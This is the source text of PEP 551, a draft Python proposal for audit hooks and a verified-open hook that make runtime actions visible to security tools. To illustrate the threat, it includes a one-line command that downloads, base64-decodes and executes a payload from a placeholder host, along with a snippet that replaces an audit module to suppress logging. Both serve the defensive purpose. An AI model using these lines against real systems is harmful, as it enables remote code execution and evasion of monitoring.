python-peps/pep-0551.rst

PEP: 551
Title: Security transparency in the Python runtime
Version: $Revision$
Last-Modified: $Date$
Author: Steve Dower <steve.dower@python.org>
Status: Draft
Type: Standards Track
Content-Type: text/x-rst
Created: 23-Aug-2017
Python-Version: 3.7
Post-History: 24-Aug-2017 (security-sig), 28-Aug-2017 (python-dev)

Abstract
========

This PEP describes additions to the Python API and specific behaviors
for the CPython implementation that make actions taken by the Python
runtime visible to security and auditing tools. The goals in order of
increasing importance are to prevent malicious use of Python, to detect
and report on malicious use, and most importantly to detect attempts to
bypass detection. Most of the responsibility for implementation is
required from users, who must customize and build Python for their own
environment.

We propose two small sets of public APIs to enable users to reliably
build their copy of Python without having to modify the core runtime,
protecting future maintainability. We also discuss recommendations for
users to help them develop and configure their copy of Python.

Background
==========

Software vulnerabilities are generally seen as bugs that enable remote
or elevated code execution. However, in our modern connected world, the
more dangerous vulnerabilities are those that enable advanced persistent
threats (APTs). APTs are achieved when an attacker is able to penetrate
a network, establish their software on one or more machines, and over
time extract data or intelligence. Some APTs may make themselves known
by maliciously damaging data (e.g., `WannaCrypt
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/WannaCrypt>`_)
or hardware (e.g., `Stuxnet
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?name=Win32/Stuxnet>`_).
Most attempt to hide their existence and avoid detection. APTs often use
a combination of traditional vulnerabilities, social engineering,
phishing (or spear-phishing), thorough network analysis, and an
understanding of misconfigured environments to establish themselves and
do their work.

The first infected machines may not be the final target and may not
require special privileges. For example, an APT that is established as a
non-administrative user on a developer’s machine may have the ability to
spread to production machines through normal deployment channels. It is
common for APTs to persist on as many machines as possible, with sheer
weight of presence making them difficult to remove completely.

Whether an attacker is seeking to cause direct harm or hide their
tracks, the biggest barrier to detection is a lack of insight. System
administrators with large networks rely on distributed logs to
understand what their machines are doing, but logs are often filtered to
show only error conditions. APTs that are attempting to avoid detection
will rarely generate errors or abnormal events. Reviewing normal
operation logs involves a significant amount of effort, though work is
underway by a number of companies to enable automatic anomaly detection
within operational logs. The tools preferred by attackers are ones that
are already installed on the target machines, since log messages from
these tools are often expected and ignored in normal use.

At this point, we are not going to spend further time discussing the
existence of APTs or methods and mitigations that do not apply to this
PEP. For further information about the field, we recommend reading or
watching the resources listed under `Further Reading`_.

Python is a particularly interesting tool for attackers due to its
prevalence on server and developer machines, its ability to execute
arbitrary code provided as data (as opposed to native binaries), and its
complete lack of internal auditing. This allows attackers to download,
decrypt, and execute malicious code with a single command::

    python -c "import urllib.request, base64;
        exec(base64.b64decode(
            urllib.request.urlopen('http://my-exploit/py.b64')
        ).decode())"

This command currently bypasses most anti-malware scanners that rely on
recognizable code being read through a network connection or being
written to disk (base64 is often sufficient to bypass these checks). It
also bypasses protections such as file access control lists or
permissions (no file access occurs), approved application lists
(assuming Python has been approved for other uses), and automated
auditing or logging (assuming Python is allowed to access the internet
or access another machine on the local network from which to obtain its
payload).

General consensus among the security community is that totally
preventing attacks is infeasible and defenders should assume that they
will often detect attacks only after they have succeeded. This is known
as the "assume breach" mindset. [1]_ In this scenario, protections such
as sandboxing and input validation have already failed, and the
important task is detection, tracking, and eventual removal of the
malicious code. To this end, the primary feature required from Python is
security transparency: the ability to see what operations the Python
runtime is performing that may indicate anomalous or malicious use.
Preventing such use is valuable, but secondary to the need to know that
it is occurring.

To summarise the goals in order of increasing importance:

* preventing malicious use is valuable
* detecting malicious use is important
* detecting attempts to bypass detection is critical

One example of a scripting engine that has addressed these challenges is
PowerShell, which has recently been enhanced towards similar goals of
transparency and prevention. [2]_

Generally, application and system configuration will determine which
events within a scripting engine are worth logging. However, given the
value of many logs events are not recognized until after an attack is
detected, it is important to capture as much as possible and filter
views rather than filtering at the source (see the No Easy Breach video
from `Further Reading`_). Events that are always of interest include
attempts to bypass auditing, attempts to load and execute code that is
not correctly signed or access-controlled, use of uncommon operating
system functionality such as debugging or inter-process inspection
tools, most network access and DNS resolution, and attempts to create
and hide files or configuration settings on the local machine.

To summarize, defenders have a need to audit specific uses of Python in
order to detect abnormal or malicious usage. Currently, the Python
runtime does not provide any ability to do this, which (anecdotally) has
led to organizations switching to other languages. The aim of this PEP
is to enable system administrators to deploy a security transparent copy
of Python that can integrate with their existing auditing and protection
systems.

On Windows, some specific features that may be enabled by this include:

* Script Block Logging [3]_
* DeviceGuard [4]_
* AMSI [5]_
* Persistent Zone Identifiers [6]_
* Event tracing (which includes event forwarding) [7]_

On Linux, some specific features that may be integrated are:

* gnupg [8]_
* sd_journal [9]_
* OpenBSM [10]_
* syslog [11]_
* auditd [12]_
* SELinux labels [13]_
* check execute bit on imported modules

On macOS, some features that may be used with the expanded APIs are:

* OpenBSM [10]_
* syslog [11]_

Overall, the ability to enable these platform-specific features on
production machines is highly appealing to system administrators and
will make Python a more trustworthy dependency for application
developers.

Overview of Changes
===================

True security transparency is not fully achievable by Python in
isolation. The runtime can audit as many events as it likes, but unless
the logs are reviewed and analyzed there is no value. Python may impose
restrictions in the name of security, but usability may suffer.
Different platforms and environments will require different
implementations of certain security features, and organizations with the
resources to fully customize their runtime should be encouraged to do
so.

The aim of these changes is to enable system administrators to integrate
Python into their existing security systems, without dictating what
those systems look like or how they should behave. We propose two API
changes to enable this: an Audit Hook and Verified Open Hook. Both are
not set by default, and both require modifications to the entry point
binary to enable any functionality. For the purposes of validation and
example, we propose a new ``spython``/``spython.exe`` entry point
program that enables some basic functionality using these hooks.
**However, security-conscious organizations are expected to create their
own entry points to meet their own needs.**

Audit Hook
----------

In order to achieve security transparency, an API is required to raise
messages from within certain operations. These operations are typically
deep within the Python runtime or standard library, such as dynamic code
compilation, module imports, DNS resolution, or use of certain modules
such as ``ctypes``.

The new C APIs required for audit hooks are::

   # Add an auditing hook
   typedef int (*hook_func)(const char *event, PyObject *args);
   int PySys_AddAuditHook(hook_func hook);

   # Raise an event with all auditing hooks
   int PySys_Audit(const char *event, PyObject *args);

   # Internal API used during Py_Finalize() - not publicly accessible
   void _Py_ClearAuditHooks(void);

The new Python APIs for audit hooks are::

   # Add an auditing hook
   sys.addaudithook(hook: Callable[str, tuple]) -> None

   # Raise an event with all auditing hooks
   sys.audit(str, *args) -> None


Hooks are added by calling ``PySys_AddAuditHook()`` from C at any time,
including before ``Py_Initialize()``, or by calling
``sys.addaudithook()`` from Python code. Hooks are never removed or
replaced, and existing hooks have an opportunity to refuse to allow new
hooks to be added (adding an audit hook is audited, and so preexisting
hooks can raise an exception to block the new addition).

When events of interest are occurring, code can either call
``PySys_Audit()`` from C (while the GIL is held) or ``sys.audit()``. The
string argument is the name of the event, and the tuple contains
arguments. A given event name should have a fixed schema for arguments,
and both arguments are considered a public API (for a given x.y version
of Python), and thus should only change between feature releases with
updated documentation.

When an event is audited, each hook is called in the order it was added
with the event name and tuple. If any hook returns with an exception
set, later hooks are ignored and *in general* the Python runtime should
terminate. This is intentional to allow hook implementations to decide
how to respond to any particular event. The typical responses will be to
log the event, abort the operation with an exception, or to immediately
terminate the process with an operating system exit call.

When an event is audited but no hooks have been set, the ``audit()``
function should include minimal overhead. Ideally, each argument is a
reference to existing data rather than a value calculated just for the
auditing call.

As hooks may be Python objects, they need to be freed during
``Py_Finalize()``. To do this, we add an internal API
``_Py_ClearAuditHooks()`` that releases any ``PyObject*`` hooks that are
held, as well as any heap memory used. This is an internal function with
no public export, but it triggers an event for all audit hooks to ensure
that unexpected calls are logged.

See `Audit Hook Locations`_ for proposed audit hook points and schemas,
and the `Recommendations`_ section for discussion on
appropriate responses.

Verified Open Hook
------------------

Most operating systems have a mechanism to distinguish between files
that can be executed and those that can not. For example, this may be an
execute bit in the permissions field, or a verified hash of the file
contents to detect potential code tampering. These are an important
security mechanism for preventing execution of data or code that is not
approved for a given environment. Currently, Python has no way to
integrate with these when launching scripts or importing modules.

The new public C API for the verified open hook is::

   # Set the handler
   typedef PyObject *(*handler_func)(const char *narrow,
                                     const wchar_t *wide)
   int PyOS_SetOpenForExecuteHandler(handler_func handler)

   # Open a file using the handler
   PyObject *PyOS_OpenForExec(PyObject *path)

The new public Python API for the verified open hook is::

   # Open a file using the handler
   os.open_for_exec(pathlike)

The ``os.open_for_exec()`` function is a drop-in replacement for
``open(pathlike, 'rb')``. Its default behaviour is to open a file for
raw, binary access - any more restrictive behaviour requires the use of
a custom handler. (Aside: since ``importlib`` requires access to this
function before the ``os`` module has been imported, it will be
available on the ``nt``/``posix`` modules, but the intent is that other
users will access it through the ``os`` module.)

A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()``
from C at any time, including before ``Py_Initialize()``. However, if a
handler has already been set then the call will fail. When
``open_for_exec()`` is called with a handler set, the handler will be
passed the processed narrow or wide path, depending on platform, and its
return value will be returned directly. The returned object should be an
open file-like object that supports reading raw bytes. This is
explicitly intended to allow a ``BytesIO`` instance if the open handler
has already had to read the file into memory in order to perform
whatever verification is necessary to determine whether the content is
permitted to be executed.

Note that these handlers can import and call the ``_io.open()`` function
on CPython without triggering themselves.

If the handler determines that the file is not suitable for execution,
it should raise an exception of its choice, as well as raising any other
auditing events or notifications.

All import and execution functionality involving code from a file will
be changed to use ``open_for_exec()`` unconditionally. It is important
to note that calls to ``compile()``, ``exec()`` and ``eval()`` do not go
through this function - an audit hook that includes the code from these
calls will be added and is the best opportunity to validate code that is
read from the file. Given the current decoupling between import and
execution in Python, most imported code will go through both
``open_for_exec()`` and the log hook for ``compile``, and so care should
be taken to avoid repeating verification steps.

.. note::
   The use of ``open_for_exec()`` by ``importlib`` is a valuable first
   defence, but should not be relied upon to prevent misuse. In
   particular, it is easy to monkeypatch ``importlib`` in order to
   bypass the call. Auditing hooks are the primary way to achieve
   security transparency, and are essential for detecting attempts to
   bypass other functionality.

API Availability
----------------

While all the functions added here are considered public and stable API,
the behavior of the functions is implementation specific. The
descriptions here refer to the CPython implementation, and while other
implementations should provide the functions, there is no requirement
that they behave the same.

For example, ``sys.addaudithook()`` and ``sys.audit()`` should exist but
may do nothing. This allows code to make calls to ``sys.audit()``
without having to test for existence, but it should not assume that its
call will have any effect. (Including existence tests in
security-critical code allows another vector to bypass auditing, so it
is preferable that the function always exist.)

``os.open_for_exec(pathlike)`` should at a minimum always return
``_io.open(pathlike, 'rb')``. Code using the function should make no
further assumptions about what may occur, and implementations other than
CPython are not required to let developers override the behavior of this
function with a hook.

Audit Hook Locations
====================

Calls to ``sys.audit()`` or ``PySys_Audit()`` will be added to the
following operations with the schema in Table 1. Unless otherwise
specified, the ability for audit hooks to abort any listed operation
should be considered part of the rationale for including the hook.

.. csv-table:: Table 1: Audit Hooks
   :header: "API Function", "Event Name", "Arguments", "Rationale"
   :widths: 2, 2, 3, 6

   ``PySys_AddAuditHook``, ``sys.addaudithook``, "", "Detect when new
   audit hooks are being added.
   "
   ``_PySys_ClearAuditHooks``, ``sys._clearaudithooks``, "", "Notifies
   hooks they are being cleaned up, mainly in case the event is
   triggered unexpectedly. This event cannot be aborted.
   "
   ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", "
   Detects any attempt to set the ``open_for_execute`` handler.
   "
   "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``,
   ``PyAST_obj2mod``", ``compile``, "``(code, filename_or_none)``", "
   Detect dynamic code compilation, where ``code`` could be a string or
   AST. Note that this will be called for regular imports of source
   code, including those that were opened with ``open_for_exec``.
   "
   "``exec``, ``eval``, ``run_mod``", ``exec``, "``(code_object,)``", "
   Detect dynamic execution of code objects. This only occurs for
   explicit calls, and is not raised for normal function invocation.
   "
   ``import``, ``import``, "``(module, filename, sys.path,
   sys.meta_path, sys.path_hooks)``", "Detect when modules are
   imported. This is raised before the module name is resolved to a
   file. All arguments other than the module name may be ``None`` if
   they are not used or available.
   "
   ``code_new``, ``code.__new__``, "``(bytecode, filename, name)``", "
   Detect dynamic creation of code objects. This only occurs for
   direct instantiation, and is not raised for normal compilation.
   "
   ``func_new_impl``, ``function.__new__``, "``(code,)``", "Detect
   dynamic creation of function objects. This only occurs for direct
   instantiation, and is not raised for normal compilation.
   "
   "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
   ``(module_or_path,)``", "Detect when native modules are used.
   "
   ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", "
   Collect information about specific symbols retrieved from native
   modules.
   "
   ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect
   when code is accessing arbitrary memory using ``ctypes``.
   "
   ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing
   the id of objects, which in CPython reveals information about
   memory layout.
   "
   ``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect
   when code is accessing frames directly.
   "
   ``sys._current_frames``, ``sys._current_frames``, "", "Detect when
   code is accessing frames directly.
   "
   ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is
   injecting trace functions. Because of the implementation, exceptions
   raised from the hook will abort the operation, but will not be
   raised in Python code. Note that ``threading.setprofile`` eventually
   calls this function, so the event will be audited for each thread.
   "
   ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is
   injecting trace functions. Because of the implementation, exceptions
   raised from the hook will abort the operation, but will not be
   raised in Python code. Note that ``threading.settrace`` eventually
   calls this function, so the event will be audited for each thread.
   "
   ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "
   ", "Detect changes to async generator hooks.
   "
   ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "
   ", "Detect changes to async generator hooks.
   "
   ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "
   ", "Detect changes to the coroutine wrapper.
   "
   ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``, "
   ``(new_limit,)``", "Detect changes to the recursion limit.
   "
   ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``, "
   ``(interval_us,)``", "Detect changes to the switching interval.
   "
   "``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
   ``socket.getaddrinfo``, ``socket.getnameinfo``, ``socket.sendmsg``,
   ``socket.sendto``", ``socket.address``, "``(address,)``", "Detect
   access to network resources. The address is unmodified from the
   original call.
   "
   ``socket.__init__``, "socket()", "``(family, type, proto)``", "
   Detect creation of sockets. The arguments will be int values.
   "
   ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts
   to retrieve the current host name.
   "
   ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "
   Detect attempts to change the current host name. The name argument
   is passed as a bytes object.
   "
   "``socket.gethostbyname``, ``socket.gethostbyname_ex``",
   "``socket.gethostbyname``", "``(name,)``", "Detect host name
   resolution. The name argument is a str or bytes object.
   "
   ``socket.gethostbyaddr``, ``socket.gethostbyaddr``, "
   ``(address,)``", "Detect host resolution. The address argument is a
   str or bytes object.
   "
   ``socket.getservbyname``, ``socket.getservbyname``, "``(name,
   protocol)``", "Detect service resolution. The arguments are str
   objects.
   "
   "``socket.getservbyport``", ``socket.getservbyport``, "``(port,
   protocol)``", "Detect service resolution. The port argument is an
   int and protocol is a str.
   "
   "``member_get``, ``func_get_code``, ``func_get_[kw]defaults``
   ",``object.__getattr__``,"``(object, attr)``","Detect access to
   restricted attributes. This event is raised for any built-in
   members that are marked as restricted, and members that may allow
   bypassing imports.
   "
   "``_PyObject_GenericSetAttr``, ``check_set_special_type_attr``,
   ``object_set_class``, ``func_set_code``, ``func_set_[kw]defaults``","
   ``object.__setattr__``","``(object, attr, value)``","Detect monkey
   patching of types and objects. This event
   is raised for the ``__class__`` attribute and any attribute on
   ``type`` objects.
   "
   "``_PyObject_GenericSetAttr``",``object.__delattr__``,"``(object,
   attr)``","Detect deletion of object attributes. This event is raised
   for any attribute on ``type`` objects.
   "
   "``Unpickler.find_class``",``pickle.find_class``,"``(module_name,
   global_name)``","Detect imports and global name lookup when
   unpickling.
   "
   "``array_new``",``array.__new__``,"``(typecode, initial_value)``", "
   Detects creation of array objects.
   "

TODO - more hooks in ``_socket``, ``_ssl``, others?

SPython Entry Point
===================

A new entry point binary will be added, called ``spython.exe`` on
Windows and ``spythonX.Y`` on other platforms. This entry point is
intended primarily as an example, as we expect most users of this
functionality to implement their own entry point and hooks (see
`Recommendations`_). It will also be used for tests.

Source builds will build ``spython`` by default, but distributions
should not include it except as a test binary. The python.org managed
binary distributions will not include ``spython``.

**Do not accept most command-line arguments**

The ``spython`` entry point requires a script file be passed as the
first argument, and does not allow any options. This prevents arbitrary
code execution from in-memory data or non-script files (such as pickles,
which can be executed using ``-m pickle <path>``.

Options ``-B`` (do not write bytecode), ``-E`` (ignore environment
variables) and ``-s`` (no user site) are assumed.

If a file with the same full path as the process with a ``._pth`` suffix
(``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it
will be used to initialize ``sys.path`` following the rules currently
described `for Windows
<https://docs.python.org/3/using/windows.html#finding-modules>`_.

When built with ``Py_DEBUG``, the ``spython`` entry point will allow a
``-i`` option with no other arguments to enter into interactive mode,
with audit messages being written to standard error rather than a file.
This is intended for testing and debugging only.

**Log security events to a file**

Before initialization, ``spython`` will set an audit hook that writes
events to a local file. By default, this file is the full path of the
process with a ``.log`` suffix, but may be overridden with the
``SPYTHONLOG`` environment variable (despite such overrides being
explicitly discouraged in `Recommendations`_).

The audit hook will also abort all ``sys.addaudithook`` events,
preventing any other hooks from being added.

**Restrict importable modules**

Also before initialization, ``spython`` will set an open-for-execute
hook that validates all files opened with ``os.open_for_exec``. This
implementation will require all files to have a ``.py`` suffix (thereby
blocking the use of cached bytecode), and will raise a custom audit
event ``spython.open_for_exec`` containing ``(filename,
True_if_allowed)``.

On Windows, the hook will also open the file with flags that prevent any
other process from opening it with write access, which allows the hook
to perform additional validation on the contents with confidence that it
will not be modified between the check and use. Compilation will later
trigger a ``compile`` event, so there is no need to read the contents
now for AMSI, but other validation mechanisms such as DeviceGuard [4]_
should be performed here.

**Restrict globals in pickles**

The ``spython`` entry point will abort all ``pickle.find_class`` events
that use the default implementation. Overrides will not raise audit
events unless explicitly added, and so they will continue to be allowed.

Performance Impact
==================

The important performance impact is the case where events are being
raised but there are no hooks attached. This is the unavoidable case -
once a distributor or sysadmin begins adding audit hooks they have
explicitly chosen to trade performance for functionality. Performance
impact using ``spython`` or with hooks added are not of interest here,
since this is considered opt-in functionality.

Analysis using the ``performance`` tool shows no significant impact,
with the vast majority of benchmarks showing between 1.05x faster to
1.05x slower.

In our opinion, the performance impact of the set of auditing points
described in this PEP is negligible.

Recommendations
===============

Specific recommendations are difficult to make, as the ideal
configuration for any environment will depend on the user's ability to
manage, monitor, and respond to activity on their own network. However,
many of the proposals here do not appear to be of value without deeper
illustration. This section provides recommendations using the terms
**should** (or **should not**), indicating that we consider it dangerous
to ignore the advice, and **may**, indicating that for the advice ought
to be considered for high value systems. The term **sysadmins** refers
to whoever is responsible for deploying Python throughout your network;
different organizations may have an alternative title for the
responsible people.

Sysadmins **should** build their own entry point, likely starting from
the ``spython`` source, and directly interface with the security systems
available in their environment. The more tightly integrated, the less
likely a vulnerability will be found allowing an attacker to bypass
those systems. In particular, the entry point **should not** obtain any
settings from the current environment, such as environment variables,
unless those settings are otherwise protected from modification.

Audit messages **should not** be written to a local file. The
``spython`` entry point does this for example and testing purposes. On
production machines, tools such as ETW [7]_ or auditd [12]_ that are
intended for this purpose should be used.

The default ``python`` entry point **should not** be deployed to
production machines, but could be given to developers to use and test
Python on non-production machines. Sysadmins **may** consider deploying
a less restrictive version of their entry point to developer machines,
since any system connected to your network is a potential target.
Sysadmins **may** deploy their own entry point as ``python`` to obscure
the fact that extra auditing is being included.

Python deployments **should** be made read-only using any available
platform functionality after deployment and during use.

On platforms that support it, sysadmins **should** include signatures
for every file in a Python deployment, ideally verified using a private
certificate. For example, Windows supports embedding signatures in
executable files and using catalogs for others, and can use DeviceGuard
[4]_ to validate signatures either automatically or using an
``open_for_exec`` hook.

Sysadmins **should** log as many audited events as possible, and
**should** copy logs off of local machines frequently. Even if logs are
not being constantly monitored for suspicious activity, once an attack
is detected it is too late to enable auditing. Audit hooks **should
not** attempt to preemptively filter events, as even benign events are
useful when analyzing the progress of an attack. (Watch the "No Easy
Breach" video under `Further Reading`_ for a deeper look at this side of
things.)

Most actions **should not** be aborted if they could ever occur during
normal use or if preventing them will encourage attackers to work around
them. As described earlier, awareness is a higher priority than
prevention. Sysadmins **may** audit their Python code and abort
operations that are known to never be used deliberately.

Audit hooks **should** write events to logs before attempting to abort.
As discussed earlier, it is more important to record malicious actions
than to prevent them.

Sysadmins **should** identify correlations between events, as a change
to correlated events may indicate misuse. For example, module imports
will typically trigger the ``import`` auditing event, followed by an
``open_for_exec`` call and usually a ``compile`` event. Attempts to
bypass auditing will often suppress some but not all of these events. So
if the log contains ``import`` events but not ``compile`` events,
investigation may be necessary.

The first audit hook **should** be set in C code before
``Py_Initialize`` is called, and that hook **should** unconditionally
abort the ``sys.addloghook`` event. The Python interface is primarily
intended for testing and development.

To prevent audit hooks being added on non-production machines, an entry
point **may** add an audit hook that aborts the ``sys.addloghook`` event
but otherwise does nothing.

On production machines, a non-validating ``open_for_exec`` hook **may**
be set in C code before ``Py_Initialize`` is called. This prevents later
code from overriding the hook, however, logging the
``setopenforexecutehandler`` event is useful since no code should ever
need to call it. Using at least the sample ``open_for_exec`` hook
implementation from ``spython`` is recommended.

Since ``importlib``'s use of ``open_for_exec`` may be easily bypassed
with monkeypatching, an audit hook **should** be used to detect
attribute changes on type objects.

[TODO: more good advice; less bad advice]

Rejected Ideas
==============

Separate module for audit hooks
-------------------------------

The proposal is to add a new module for audit hooks, hypothetically
``audit``. This would separate the API and implementation from the
``sys`` module, and allow naming the C functions ``PyAudit_AddHook`` and
``PyAudit_Audit`` rather than the current variations.

Any such module would need to be a built-in module that is guaranteed to
always be present. The nature of these hooks is that they must be
callable without condition, as any conditional imports or calls provide
more opportunities to intercept and suppress or modify events.

Given its nature as one of the most core modules, the ``sys`` module is
somewhat protected against module shadowing attacks. Replacing ``sys``
with a sufficiently functional module that the application can still run
is a much more complicated task than replacing a module with only one
function of interest. An attacker that has the ability to shadow the
``sys`` module is already capable of running arbitrary code from files,
whereas an ``audit`` module can be replaced with a single statement::

    import sys; sys.modules['audit'] = type('audit', (object,),
        {'audit': lambda *a: None, 'addhook': lambda *a: None})

Multiple layers of protection already exist for monkey patching attacks
against either ``sys`` or ``audit``, but assignments or insertions to
``sys.modules`` are not audited.

This idea is rejected because it makes substituting ``audit`` calls
throughout all callers near trivial.

Flag in sys.flags to indicate "secure" mode
-------------------------------------------

The proposal is to add a value in ``sys.flags`` to indicate when Python
is running in a "secure" mode. This would allow applications to detect
when some features are enabled and modify their behaviour appropriately.

Currently there are no guarantees made about security by this PEP - this
section is the first time the word "secure" has been used. Security
**transparency** does not result in any changed behaviour, so there is
no appropriate reason for applications to modify their behaviour.

Both application-level APIs ``sys.audit`` and ``os.open_for_exec`` are
always present and functional, regardless of whether the regular
``python`` entry point or some alternative entry point is used. Callers
cannot determine whether any hooks have been added (except by performing
side-channel analysis), nor do they need to. The calls should be fast
enough that callers do not need to avoid them, and the sysadmin is
responsible for ensuring their added hooks are fast enough to not affect
application performance.

The argument that this is "security by obscurity" is valid, but
irrelevant. Security by obscurity is only an issue when there are no
other protective mechanisms; obscurity as the first step in avoiding
attack is strongly recommended (see `this article
<https://danielmiessler.com/study/security-by-obscurity/>`_ for
discussion).

This idea is rejected because there are no appropriate reasons for an
application to change its behaviour based on whether these APIs are in
use.

Further Reading
===============


**Redefining Malware: When Old Terms Pose New Threats**
    By Aviv Raff for SecurityWeek, 29th January 2014

    This article, and those linked by it, are high-level summaries of the rise of
    APTs and the differences from "traditional" malware.

    `<http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats>`_

**Anatomy of a Cyber Attack**
    By FireEye, accessed 23rd August 2017

    A summary of the techniques used by APTs, and links to a number of relevant
    whitepapers.

    `<https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html>`_

**Automated Traffic Log Analysis: A Must Have for Advanced Threat Protection**
    By Aviv Raff for SecurityWeek, 8th May 2014

    High-level summary of the value of detailed logging and automatic analysis.

    `<http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection>`_

**No Easy Breach: Challenges and Lessons Learned from an Epic Investigation**
    Video presented by Matt Dunwoody and Nick Carr for Mandiant at SchmooCon 2016

    Detailed walkthrough of the processes and tools used in detecting and removing
    an APT.

    `<https://archive.org/details/No_Easy_Breach>`_

**Disrupting Nation State Hackers**
    Video presented by Rob Joyce for the NSA at USENIX Enigma 2016

    Good security practices, capabilities and recommendations from the chief of
    NSA's Tailored Access Operation.

    `<https://www.youtube.com/watch?v=bDJb8WOJYdA>`_

References
==========

.. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_

.. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
   Protection Advances in Windows 10, `<https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/>`_

.. [3] `<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>`_

.. [4] `<https://aka.ms/deviceguard>`_

.. [5] AMSI, `<https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx>`_

.. [6] Persistent Zone Identifiers, `<https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx>`_

.. [7] Event tracing, `<https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx>`_

.. [8] `<https://www.gnupg.org/>`_

.. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_

.. [10] `<http://www.trustedbsd.org/openbsm.html>`_

.. [11] `<https://linux.die.net/man/3/syslog>`_

.. [12] `<http://security.blogoverflow.com/2013/01/a-brief-introduction-to-auditd/>`_

.. [13] SELinux access decisions `<http://man7.org/linux/man-pages/man3/avc_entry_ref_init.3.html>`_

Acknowledgments
===============

Thanks to all the people from Microsoft involved in helping make the
Python runtime safer for production use, and especially to James Powell
for doing much of the initial research, analysis and implementation, Lee
Holmes for invaluable insights into the info-sec field and PowerShell's
responses, and Brett Cannon for the restraining and grounding
discussions.

Copyright
=========

Copyright (c) 2017 by Microsoft Corporation. This material may be
distributed only subject to the terms and conditions set forth in the
Open Publication License, v1.0 or later (the latest version is presently
available at http://www.opencontent.org/openpub/).